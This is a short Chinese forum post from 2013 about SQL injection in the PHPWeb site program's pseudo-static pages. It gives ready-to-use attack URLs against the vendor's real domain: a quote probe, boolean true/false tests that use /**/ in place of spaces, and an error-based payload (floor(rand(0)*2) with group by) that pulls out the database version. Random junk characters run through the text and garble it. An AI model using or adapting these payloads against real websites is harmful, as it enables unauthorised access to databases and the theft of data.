phpweb所有的整站程序伪静态页面都存在sql注入 t" A L K7 {4 v. G8 B
* T, J0 S( B, l* k r4 C2 X# j% w主站:http://phpweb.net/
2 u( v$ _" X/ R3 b" J, c加’检测:
; T3 m6 h& X. p% l6 H , Z" I9 _) z( K; R/ q
http://www.phpweb.net/down/html/?772′.html
4 `2 ~, ~5 m( y4 v% G9 H . [+ D* g$ t$ l# D" l
出错3 l) {$ k1 [' L2 N- s4 w* j/ u
存在注入。
! O5 X2 q1 T* S2 F不能用空格,只能用/*罗
$ b4 o6 x( |# ^0 m7 V {http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常2 E" J# L. M6 f' ^
# j8 L0 a5 Z5 U
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
3 y" P& F3 U! {1 o爆数据库版本:
' \$ L7 D' ^$ d3 w: D; T # ?0 r$ D2 d( W8 A' y
?3 [7 Y- j# f" b9 Z2 e1 C
1
8 w z/ |0 Q- r! D+ ?0 @http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html/ T1 m2 a' T" K7 M3 r
更新日期: 2013-01-03 13:39:50 ) P. s9 s4 W" i0 M
|
发表于 2013-1-4 19:46:42
收藏
支持
反对